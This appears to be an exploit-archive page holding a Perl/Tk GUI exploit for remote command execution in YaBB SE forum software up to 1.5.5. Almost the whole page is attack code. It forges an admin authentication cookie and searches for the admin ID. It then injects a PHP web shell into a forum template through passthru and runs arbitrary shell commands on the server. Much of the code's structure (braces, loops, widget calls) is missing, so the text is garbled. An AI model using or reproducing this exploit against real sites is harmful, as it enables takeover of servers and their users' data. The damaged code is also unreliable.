YaBB SE <= 1.5.5 Remote Command Execution Exploit

Gerardo Vazquez, Eduardo Arriols 22.01.2008 Verified Vulnerable-App
Web Application Exploits PHP

Exploit Code


## YaBB SE version <= 1.5.5 commands execution exploit by RST/GHC
## GUI version =)))
##                   KEEP IT PRIVATE
## (c)oded by 1dt.w0lf
## http://rst.void.ru
## http://ghc.ru

use Tk;
use Tk::Menu;
use LWP::UserAgent;

$top = MainWindow->new();

$url = 'http://server/forum/index.php';
$id  = '1';
$cookie_name = 'YaBBSE155';
$cmd = 'ls -la; id; uname -a;';
$_button_1_text = 'Found admin ID';
$found_admin_id = \&found_admin_id_start;
$stop = 0;

$xpl = LWP::UserAgent->new() or die;


Dialog::run() if defined &Dialog::run;


sub get_cookie_name()
 $_text_1->insert('end', "[~] Try get cookie name\n");
 $res = $xpl->get($url.'?action=logout&sesc=1','Cookie'=>'PHPSESSID=1');
 if(!$res->is_success) { &connect_error(); }
  $cookie = '';
  if($res->as_string =~ /Set-Cookie: (.*)=deleted;/) { $cookie = $1; }
  if($cookie ne '') { $_text_1->insert('end', "[+] COOKIE NAME: ".$cookie."\n"); $cookie_name = $cookie; }
  else { $_text_1->insert('end', "[-] Can't get cookie name\n"); }

sub found_admin_id_stop()
 $stop = 1;
 $_button_1_text = 'Found admin ID';
 $found_admin_id = \&found_admin_id_start;

sub found_admin_id_start()
 $_button_1_text = '     Stop     ';
 $found_admin_id = \&found_admin_id_stop;
 $_text_1->insert('end', "[~] Try found admin ID\n");
 $success = 0;
 $error = 0;
  last if $stop;  
   if(&user_admin()) { $success = 1; last; }
  if($error) { last; }
 if($success) { $_text_1->insert('end', "[+] ADMIN ID: ".$id."\n"); }
 $_button_1_text = 'Found admin ID';
 $found_admin_id = \&found_admin_id_start;
 $stop = 0;

sub create_cookie()
 return $cookie_name.'=a%3A2%3A%7Bi%3A0%3Bs%3A'.length($id).'%3A%22'.$id.'%22%3Bi%3A1%3Bb%3A1%3B%7D';   

sub login()
 $_text_1->insert('end', "[~] Try login with USER ID: ".$id."\n");
 $res = $xpl->get($url,cookie => &create_cookie);
 if(!$res->is_success) { $error = 1; &connect_error(); return 0; }
 else { return 1; }

sub user_exist()
 if($res->as_string =~ /action=profile/) { $_text_1->insert('end', "[+] Successfully logged in\n"); return 1; }
 else { $_text_1->insert('end', "[-] User with this ID not exists\n"); return 0; }
sub user_admin()
 if($res->as_string =~ /action=admin/) { $_text_1->insert('end', "[+] This user have admin rights\n"); return 1; }
 else { $_text_1->insert('end', "[-] This user don't have admin rights\n"); return 0; }  

sub create_shell()
 $_text_1->insert('end', "[~] Try create shell\n");
 $res = $xpl->get($url.'?action=modtemp',cookie => &create_cookie);
 if(!$res->is_success) { &connect_error(); }
  $_text_1->insert('end', "[~] Try get & edit template\n"); 
  @data = split(/\n/,$res->content());
  $t = $sc = '';
  $already = 0;
   if(/input type="hidden" name="sc" value="([^"]*)"/) { $sc = $1; }   
   if(/RST_GHC_TEMPLATE/) { $already = 1; last; }   
   if(/(.*)<\/textarea>/) { $t .= $1."\n"; $p = 0; }
   $t .= $_."\n" if $p;
   if(/<textarea[^>]*name="template"[^>]*>(.*)/) { $t .= $1."\n"; $p = 1; }
   $_text_1->insert('end', "[!] Template already modified\n[+] Skip Template editing\n");  
   $_text_1->insert('end', "[~] Edit Template\n");
   $new_t = '<? if(isset($_POST[\'RSTGHC\'])) { echo "RST_GHC_TEMPLATE"; passthru($_POST[\'RSTGHC\']); echo "RST_GHC_TEMPLATE"; } ?>';

   $t =~ s/</</g;
   $t =~ s/>/>/g;
   $t =~ s/"/"/g;
   $t =~ s/&/&/g;
   $t =~ s/&nbsp;/ /g;

   $new_t .= $t;

   $res = $xpl->post($url,
                  'action'   => 'modtemp2',
                  'submit'   => 'Save',
                  'template' => $new_t,
                  'sc'       => $sc,
                  ,cookie => 'PHPSESSID='.$sc.';'.&create_cookie);
   $_text_1->insert('end', "[+] DONE!\n[!] Now you can execute commands\n");

sub execute_command()
 $_text_1->insert('end',"[~] Try execute command\n");
 $res = $xpl->post($url,['RSTGHC'=>$cmd]);
 if(!$res->is_success) { &connect_error(); }
  @rez = split("RST_GHC_TEMPLATE",$res->content);
  $_text_1->insert('end',"[+] EOF\n");
sub connect_error()
 $_text_1->insert('end', "[-] Error: ".$res->status_line."\n");  

sub Dialog::ui {
    our($root) = @_;

    # Widget Initialization
    $_frame_6 = $root->Frame(
    $_frame_12 = $root->Frame(
    $_frame_13 = $root->Frame(
    $_label_1 = $root->Label(
    -font => 'Webdings 24 bold',
    -text => "!",
    $_label_2 = $root->Label(
    -activebackground => "#ff0000",
    -activeforeground => "#ff0000",
    -font => '{Courier New} 8',
    -foreground => "#ff0000",
    -text => "YaBB SE <= 1.5.5 command execution exploit by RST/GHC",
    $_label_5 = $root->Label(
    -font => '{Courier New} 8',
    -text => "PATH TO INDEX.PHP:",
    $_label_6 = $root->Label(
    -font => '{Courier New} 8',
    -text => "ADMIN ID:",
    $_entry_4 = $root->Entry(
    -font => '{Courier New} 8',
    -relief => "groove",
    -textvariable => \$url,
    -width => 65,
    $_entry_7 = $root->Entry(
    -font => '{Courier New} 8',
    -relief => "groove",
    -textvariable => \$id,
    our($_entry_8) = $root->Entry(
    -font => '{Courier New} 8',
    -relief => "groove",
    -textvariable => \$cookie_name,
    $_label_8 = $root->Label(
    -font => '{Courier New} 8',
    -text => "COOKIE NAME:",
    $_button_2 = $root->Button(
    -font => '{Courier New} 8',
    -height => 1,
    -relief => "groove",
    -text => "Get cookie name",
    $_button_3 = $root->Button(
    -font => '{Courier New} 8',
    -relief => "groove",
    -text => "Create shell",
    $_label_10 = $root->Label(
    -font => '{Courier New} 8',
    -text => "COMMAND FOR EXECUTE:",
    $_button_6 = $root->Button(
    -font => '{Courier New} 8',
    -relief => "groove",
    -text => "Execute command",
    $_entry_11 = $root->Entry(
    -font => '{Courier New} 8',
    -relief => "groove",
    -textvariable => \$cmd,
    -width => 65,
    $_text_1 = $root->Scrolled (
    'Text' ,
    -scrollbars => 'e' ,
    -wrap => 'word',
    -font => '{Courier New} 8',
    -height => 0,
    -relief => "groove",
    -width => 0,

    $_button_1 = $root->Button(
    -font => '{Courier New} 8',
    -relief => "groove",
    -textvariable => \$_button_1_text,
    $_label_3 = $root->Label(
    -anchor => "nw",
    -compound => "left",
    -font => '{Courier New} 8',
    -text => "* 1 default for admin",
    $_label_4 = $root->Label(
    -anchor => "w",
    -font => '{Courier New} 8',
    -justify => "left",
    -text => "* YaBBSE155 default for version 1.5.5",
    $_label_7 = $root->Label(
    -font => '{Courier New} 8',
    -text => "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru",

    # widget commands

    -command => \&get_cookie_name
    -command => \&create_shell
    -command => \&execute_command
    -command => \$found_admin_id

    # Geometry Management
    -in     => $root,
    -column => 3,
    -row    => 3,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "ew"
    -in     => $root,
    -column => 1,
    -row    => 3,
    -columnspan => 2,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "ne"
    -in     => $root,
    -column => 3,
    -row    => 4,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => ""
    -in     => $root,
    -column => 2,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => ""
    -in     => $root,
    -column => 3,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => ""
    -in     => $root,
    -column => 1,
    -row    => 2,
    -columnspan => 2,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "ne"
    -in     => $_frame_12,
    -column => 1,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "e"
    -in     => $root,
    -column => 3,
    -row    => 2,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "w"
    -in     => $_frame_6,
    -column => 1,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "w"
    -in     => $_frame_6,
    -column => 1,
    -row    => 2,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "nw"
    -in     => $_frame_12,
    -column => 1,
    -row    => 2,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "se"
    -in     => $_frame_13,
    -column => 1,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "e"
    -in     => $_frame_13,
    -column => 3,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "e"
    -in     => $_frame_12,
    -column => 1,
    -row    => 3,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "se"
    -in     => $_frame_13,
    -column => 4,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "e"
    -in     => $_frame_6,
    -column => 1,
    -row    => 3,
    -columnspan => 2,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "nw"
    -in     => $root,
    -column => 1,
    -row    => 5,
    -columnspan => 3,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "news"
    -in     => $_frame_13,
    -column => 2,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => ""
    -in     => $_frame_6,
    -column => 2,
    -row    => 1,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "ew"
    -in     => $_frame_6,
    -column => 2,
    -row    => 2,
    -columnspan => 1,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "ew"
    -in     => $root,
    -column => 1,
    -row    => 6,
    -columnspan => 3,
    -ipadx => 0,
    -ipady => 0,
    -padx => 0,
    -pady => 0,
    -rowspan => 1,
    -sticky => "nw"

    # Resize Behavior
    $root->gridRowconfigure(1, -weight => 0, -minsize => 40, -pad => 0);
    $root->gridRowconfigure(2, -weight => 0, -minsize => 12, -pad => 0);
    $root->gridRowconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
    $root->gridRowconfigure(4, -weight => 0, -minsize => 40, -pad => 0);
    $root->gridRowconfigure(5, -weight => 1, -minsize => 250, -pad => 0);
    $root->gridRowconfigure(6, -weight => 0, -minsize => 27, -pad => 0);
    $root->gridColumnconfigure(1, -weight => 0, -minsize => 5, -pad => 0);
    $root->gridColumnconfigure(2, -weight => 1, -minsize => 54, -pad => 0);
    $root->gridColumnconfigure(3, -weight => 0, -minsize => 112, -pad => 0);
    $_frame_12->gridRowconfigure(1, -weight => 0, -minsize => 2, -pad => 0);
    $_frame_12->gridRowconfigure(2, -weight => 0, -minsize => 2, -pad => 0);
    $_frame_12->gridRowconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
    $_frame_12->gridColumnconfigure(1, -weight => 0, -minsize => 40, -pad => 0);
    $_frame_13->gridRowconfigure(1, -weight => 0, -minsize => 2, -pad => 0);
    $_frame_13->gridColumnconfigure(1, -weight => 0, -minsize => 5, -pad => 0);
    $_frame_13->gridColumnconfigure(2, -weight => 0, -minsize => 40, -pad => 0);
    $_frame_13->gridColumnconfigure(3, -weight => 0, -minsize => 40, -pad => 0);
    $_frame_13->gridColumnconfigure(4, -weight => 0, -minsize => 40, -pad => 0);
    $_frame_6->gridRowconfigure(1, -weight => 0, -minsize => 2, -pad => 0);
    $_frame_6->gridRowconfigure(2, -weight => 0, -minsize => 11, -pad => 0);
    $_frame_6->gridRowconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
    $_frame_6->gridColumnconfigure(1, -weight => 0, -minsize => 2, -pad => 0);
    $_frame_6->gridColumnconfigure(2, -weight => 1, -minsize => 54, -pad => 0);


# milw0rm.com [2008-01-22]